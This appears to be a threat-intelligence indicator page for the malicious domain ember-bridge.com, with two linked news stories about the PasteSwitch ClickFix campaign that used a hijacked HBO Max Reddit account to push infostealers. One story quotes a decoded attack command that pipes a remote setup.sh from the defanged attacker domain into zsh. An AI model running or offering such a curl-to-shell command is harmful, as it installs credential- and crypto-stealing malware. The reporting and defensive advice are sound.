Search/ember-bridge.com
IOC

ember-bridge.com

Type
DOMAIN
Sources
ThreatFoxNews extraction
First seen
Sep 13, 2026
Last seen
Sep 14, 2026
payload deliveryreported by c4ffeine
Look up on VirusTotal
Linked malware
Related Stories
2
ClickFix Moves into the Browser to Steal Cryptocurrency
Researchers at Hudson Rock found that cybercriminals hijacked HBO Max’s verified Reddit account and used it to run 108 malicious ads over roughly 48 hours. The ads used HBO Max’s trusted corporate account to promote fake AI tools, developer software, and macOS utilities, lowering potential victims’ guards. Some ads directed users to convincing HBO lookalike sites that claimed to offer a native HBO Max app for macOS or a promotional download. But instead of providing an installer, the sites instructed visitors to open Terminal on their Mac or, on Windows, the Run dialog or PowerShell, and paste in a command. This is the hallmark of a growing social engineering technique known as ClickFix . ClickFix attacks disguise malicious instructions as a routine technical step, such as fixing an error, completing a CAPTCHA, verifying that you are human, or installing software. A web page may silently copy a command to the clipboard , then guide the victim through pasting and running it, by which they will infect their own device. Researchers at ADAMnetworks have dubbed the operation behind the HBO Max ads “PasteSwitch.” Its infrastructure appears to tailor the next stage to the visitor’s device and the lure being used. Observed macOS payloads included MacSync and AMOS infostealers designed to steal browser credentials and profiles, Telegram data, Apple Notes, saved passwords, and cryptocurrency wallet recovery phrases. Windows users could end up with the Amatera infostealer, which runs in memory. The operation has also been linked to cryptocurrency clipboard hijackers, which monitor copied wallet addresses and replace them with an attacker-controlled address before a transaction is sent. How to stay safe Reddit admins paused the ads and opened a security investigation after reports came in, but it is important to remain vigilant. Reportedly , ClickFix was responsible for more than half of all malware loader activity in 2025. One reason for its success is that campaigns continue to add new  methods  for tricking users and different  commands  for avoiding detection. Users of macOS Tahoe 26.4 or later may be  warned when pasting text into Terminal , but it doesn’t appear for everyone, so you shouldn’t rely on that alone. Malwarebytes can provide additional protection at several stages of a ClickFix attack. Browser Guard warns when a website tries to copy something to your clipboard, web protection blocks known malicious sites, and real-time protection can detect malware delivered by the campaign. With ClickFix running rampant and inventing new methods all the time, it’s important to be aware, careful, and protected: Treat ads with caution. A verified account does not guarantee that an ad is safe. Visit the company’s official website directly instead of downloading software through an advertisement. Slow down.  Don’t rush to follow instructions on a webpage or prompt, especially if it asks you to run commands on your device or copy-paste code. Attackers may use countdowns, user counters, or other pressure tactics to make you act quickly. Don’t run commands from untrusted sources.  Never run code or commands copied from websites, emails, ads, or messages unless you trust the source and understand what the command does. Check the instructions against official documentation or contact the company’s support team. Secure your devices.  Use an up-to-date, real-time  anti-malware solution  with a web protection component. Malwarebytes blocks ember-bridge.com, which is part of the PasteSwitch infrastructure. Educate yourself on evolving attack techniques.  Understanding that attacks may come from unexpected vectors and evolve helps maintain vigilance. Keep reading our blog! From reporting threats to removing them. Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by  downloading Malwarebytes today .
1 shared
Sep 15, 2026
ClickFix Moves into the Browser to Steal Cryptocurrency
Hackers compromised HBO Max's official Reddit account and used it to push malicious ads that launched ClickFix attacks to infect Windows and macOS devices with information-stealing malware. Security researchers at Hudson Rock and ADAMnetworks analyzed the campaign and say the verified u/hbomax Reddit account was hijacked and used to launch 108 malicious advertisements over about 48 hours. The ads used a social engineering technique known as ClickFix, which tricks users into copying and pasting malicious commands into Windows Run, PowerShell, or macOS Terminal while pretending to fix an error, verify a CAPTCHA, or install legitimate software. The type of attack has become increasingly popular among cybercriminals because victims run the malicious commands themselves using legitimate operating system tools, potentially bypassing some browser and security software designed to detect malware downloads. While some of the advertisements pushed by the HBO Max account impersonated the streaming service, others promoted fake AI tools, developer software, and macOS utilities. Hudson Rock and ADAMnetworks have linked the attack to a larger campaign they call PasteSwitch, which targets both Windows and macOS systems and has been used to distribute information stealers, loaders, cryptocurrency clippers, and fake cryptocurrency wallet applications. The researchers say PasteSwitch refers to the operation's use of attacker-supplied commands that victims paste into their systems, while the attackers' backend switches between campaigns, platforms, payloads, and crypto theft methods depending on the visitor. BleepingComputer contacted HBO and Warner Bros. Discovery with questions about the incident but has not received a response. Fake HBO Max app delivers malware The campaign was initially discovered after a Reddit user spotted an advertisement posted from the verified HBO Max account promoting what appeared to be a native HBO Max application for macOS. "I was browsing Reddit and saw an ad displaying u/hbomax as the author - this advertised a macOS HBO Max app which I'd not heard of and was interested in. The user is verified and appears to have posted many times in the official HBO Max subreddits," warned the user. "The advert takes you to hbomaxx[.]us which looks somewhat legitimate, and has a join button / download. Clicking these opens up the classic infostealer/clickfix paste this command to download. Having checked, this downloads an executable with other capabilities for account compromise (obviously all done in a full sandbox - inspecting the output only, not running anything)." After clicking the advertisement, users were redirected to a convincing fake HBO Max website that claimed to offer the application for download. One of the fake HBO Max sites used in the campaign was hbomaxx[.]us. However, clicking the download button did not download an app, but instead displayed instructions telling visitors to open Terminal and paste a command to install the software. One of the macOS commands BleepingComputer saw in this attack used Base64 encoding to obscure the command it executed. Once decoded, it contained the following command: export _watch_v2=97d9d8dc;curl -sL "https://ember-bridge[.]com/curl/a44a37519au/setup.sh"| zsh Hudson Rock noted ember-bridge[.]com as infrastructure used in September for malware delivery in the PasteSwitch operation. One malware family used in this attack is MacSync, which Hudson Rock says steals browser credentials, Firefox profiles, Telegram data, Apple Notes, and macOS passwords. Another attack chain deployed "AMOS helper," which establishes persistence using a directory named .com.apple.accountsd. The malware can then enroll infected systems with attacker-controlled servers to receive additional tasks. The campaign has also distributed fake Ledger, Trezor Suite, and Exodus cryptocurrency wallet applications designed to steal victims' wallet recovery phrases. On Windows systems, PasteSwitch has been observed displaying instructions that cause victims to execute commands using mshta and PowerShell. Hudson Rock says one Windows attack chain used an MP3/HTA polyglot to create a scheduled task, launch 32-bit PowerShell, disable Microsoft's Antimalware Scan Interface (AMSI), and generate victim-specific infrastructure based on the computer name and username. Later stages used obfuscated PowerShell and shellcode to load the Amatera Stealer directly into memory without first saving the final payload to disk. PasteSwitch has also been seen pushing cryptocurrency clipboard hijacking malware, including AnimateClipper and ZigClipper. The researchers say the HBO Max advertisement was part of a much larger advertising campaign run through the compromised Reddit account. The researchers identified 40 ads pointing to hbomaxx[.]app, 36 promoting the fake AI and developer site codex-craft[.]com, 15 promoting apple.clean-disk-guide[.]com, 11 pointing to code-desktop[.]com, and six promoting hbomax-macos[.]com. This allowed the attackers to target a larger audience than just HBO Max users, including developers and users searching for AI software and system utilities. After the malicious advertisements were reported, a Reddit admin paused them and reported them to Reddit's Security and Safety teams. It remains unclear how the attackers accessed the HBO Max Reddit account or whether any other HBO or Warner Bros. Discovery accounts or systems were affected. Join Mikko Hyppönen and security leaders from the NFL, CHANEL, and Atlassian for a two-hour digital summit on what AI-speed attacks change, what defenders should stop doing, and how to validate, decide, fix, and re-validate at machine speed. Save your seat
1 shared
Sep 14, 2026
Connections
2 relationships